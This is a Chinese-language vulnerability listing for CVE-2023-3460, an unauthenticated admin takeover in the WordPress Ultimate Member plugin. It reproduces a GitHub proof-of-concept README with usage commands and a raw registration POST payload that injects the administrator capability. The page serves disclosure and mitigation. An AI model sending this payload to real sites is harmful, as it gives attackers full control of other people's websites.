WordPress Ultimate Member Privilege Escalation Vulnerability

漏洞信息

漏洞名称: WordPress Ultimate Member Privilege Escalation Vulnerability

漏洞编号:

  • CVE: CVE-2023-3460

漏洞类型: 权限提升

漏洞等级: 严重

漏洞描述: WordPress Ultimate Member插件是一个流行的用户会员管理插件,广泛应用于WordPress网站中,用于管理用户注册、登录和个人资料等功能。该插件在版本2.6.6及之前存在一个严重的权限提升漏洞(CVE-2023-3460),允许未经认证的攻击者通过构造恶意的注册请求,将普通用户权限提升至管理员权限。这一漏洞的技术根源在于插件在处理用户注册请求时,未能正确验证和过滤用户提交的数据,特别是对wp_capabilities参数的检查不足,导致攻击者可以绕过正常的权限控制机制,直接赋予自己管理员权限。这一漏洞的影响极为严重,攻击者无需任何认证即可利用此漏洞,完全控制受影响的WordPress网站,包括但不限于发布恶意内容、窃取敏感数据、甚至进一步攻击网站服务器。由于该漏洞的利用门槛低且影响范围广,所有使用Ultimate Member插件且版本低于2.6.7的WordPress网站都应立即升级到最新版本,以避免潜在的安全风险。

产品厂商: Ultimate Member

产品名称: WordPress Ultimate Member Plugin

影响版本: ≤ 2.6.6

来源: https://github.com/GURJOTEXPERT/CVE-2023-3460

类型: CVE-2023:github search

仓库文件

  • CVE-2023-3460.py
  • README.md

来源概述

🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for CVE-2023-3460, a critical vulnerability in the WordPress plugin Ultimate Member. It allows unauthenticated users to escalate their privileges to Administrator by crafting a malicious registration request.

🔥 Impact: Full site compromise through unauthorized admin account creation.

📌 Vulnerability Details

  • Plugin Affected: Ultimate Member
  • Affected Versions: ≤ 2.6.6
  • Fixed Version: 2.6.7
  • Exploit Type: Privilege Escalation via Registration Abuse
  • Authentication Required: ❌ No
  • CVE: CVE-2023-3460

⚙️ Requirements

  • Python 3
  • requests library

Install requirements:

1
pip3 install requests

🧪 Exploit Usage

1
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>

✅ Example:

1
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com

📥 Exploit Script Features

  • Fetches CSRF nonce (_wpnonce) from the register page
  • Bypasses form validation
  • Injects wp_capabilities with administrator role
  • Creates a new admin user without authentication

🔐 Sample Exploit Payload

1
2
3
4
5
6
7
8
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
user_email=pwn@evil.com&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Mitigation

  • Update Ultimate Member plugin to v2.6.7 or above
  • Disable open registration if not required
  • Monitor user creation logs for suspicious activity

📚 References

⚠️ Disclaimer

This script is provided for educational and authorized testing purposes only. Unauthorized exploitation of systems is illegal and unethical. Use it only on systems you own or have permission to test.

👨‍💻 Author

Github Poc
#权限提升 #CVE-2023:github search
WordPress Ultimate Member Privilege Escalation Vulnerability
http://example.com/2025/07/22/github_1632551176/
作者
lianccc
发布于
2025年7月22日
许可协议